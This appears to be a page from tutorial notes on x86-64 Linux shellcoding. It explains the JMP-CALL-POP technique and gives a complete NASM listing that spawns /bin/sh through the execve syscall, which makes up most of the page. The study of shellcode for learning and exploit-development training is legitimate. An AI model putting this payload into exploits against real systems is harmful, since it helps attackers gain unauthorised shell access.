Shellcode 1 -> execve(/bin/sh) JMP CALL POP

  1. We will use JMP CALL POP technique to find the address of /bin/sh and make rdi point to it.

  2. Add a null byte after it

  3. RDX needs to point to a place where 8 byte of 0 is there.

  4. RSi needs to point to the address of /bin/sh,0x0000000000000000 instruction

Shellcode becomes:

global _start 

section .text

_start:

	jmp find_address

shellcode:
	xor rax, rax

	; Get the address of the string 
	pop rdi

	; Convert the A -> 0x0 to null terminate the string 
	mov [rdi +7], byte ah

	; Copy the address of the string in RDI to BBBBBBBB
	mov [rdi +8], rdi

	; copy the NULL 0x0000000000000000 -> CCCCCCCC

	mov [rdi +16], rax

	; Setup the addresses

	lea rsi, [rdi +8]
	lea rdx, [rdi +16]

	add rax, 59
	syscall


find_address:
	call shellcode

shell_path_string:	db	"/bin/shABBBBBBBBCCCCCCCC"

Note: lea might give an error. In that case, we have to ensure that our shellcode can edit the defined bytes in the text section. If that doesn't happen an alternate is to introduce a null byte with /bin/sh in the defined bytes and finding other ways to make RSI point to the address of /bin/sh followed by 8 bytes of 0s and RDX can be assigned by RAX which is already 0.

PreviousShellcode 1 -> execve(/bin/sh) STACK PUSHNextTechniques-> XOR-Encoder

Last updated

Was this helpful?